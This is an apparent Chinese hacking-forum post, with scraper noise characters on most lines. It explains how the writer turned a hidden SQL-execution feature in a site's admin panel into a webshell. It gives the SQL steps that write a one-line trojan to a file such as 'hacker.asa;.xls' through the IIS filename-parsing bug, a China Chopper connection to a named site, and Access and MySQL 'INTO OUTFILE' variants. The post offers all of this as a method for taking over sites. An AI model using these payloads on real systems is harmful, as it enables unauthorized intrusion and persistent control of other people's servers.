好不容易进了后台,发现啥上传啊。备份啊多木有。8 G V% [2 Y$ m) ~0 P! O9 W! h
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的$ ]7 d8 I# A- N1 L' C4 K3 N
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,( m& X: C( G2 V
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
& }* n v% r+ L1.create table cmd (a varchar(50))
- R' q8 d% U/ D7 w2.insert into cmd (a) values (‘‘)
L3 V& e1 N. P7 t3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
( g2 l$ V) h W: `(把表cmd的内容导出为物理路径的一个EXCEL文件)
! E0 M# l/ X$ d5 `& k7 |4.drop table cmd7 y+ U7 c9 J9 g* u0 ^
利用IIS的BUG成功拿到了WEBSHELL。
- Q9 s9 @/ w1 K3 @
0 Y% J1 p' n7 Z" f; a, _" m直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话. m& D- ~( U# u) L
# B" w8 E9 F) L" a
SQL语句意思解释:
- U: D; r/ P$ Q( l2 N3 X 第一句
! C+ G/ y1 X: q1 U' L 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50* \; h1 E; {) b$ T
$ g4 U6 c6 [7 [* B 第二句/ s, k( ~- q6 C5 }* W! }6 t' w
在表cmd的a字段插入一句话木马9 d( Q4 t) T' D: c. p0 {
第三句
# V7 W+ N' ^9 c2 W! {1 a! Z. n% S 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件- k" f* s2 P3 }) \! _
/ X! k1 b6 B+ }/ b1 B2 p) Y S 第四句
4 v+ y4 T6 v, q% P 删除建立的cmd表
* k: \( e2 R2 h+ h3 w- [6 {8 @' N+ Q9 a( K! [ ~: k. h$ M* i
以下内容为测试:
/ N9 L" Z3 v! n$ X0 c3 g, f: L {+ A Access利用后台SQL执行命令功能导出WebShell:8 C8 t3 S. D; {+ B
这个更简单:
b* M2 ~! ^# V4 C H4 ]4 [( H [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol], C/ h$ c1 m1 W- v
或者3 h# c# p. T& I& p+ `
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
" e$ N" F- k9 H( Q! R/ Q! \! x! V; l# E3 T9 \ U, i
后台有执行SQL语句功能(vote为已知表段)
# Q1 i6 ?+ L8 t) d+ Q7 Q1 W5 L# g2 ? 希望对大家有所帮助拿shell的又一个思路$ k1 W4 q! z4 s& w# Y
|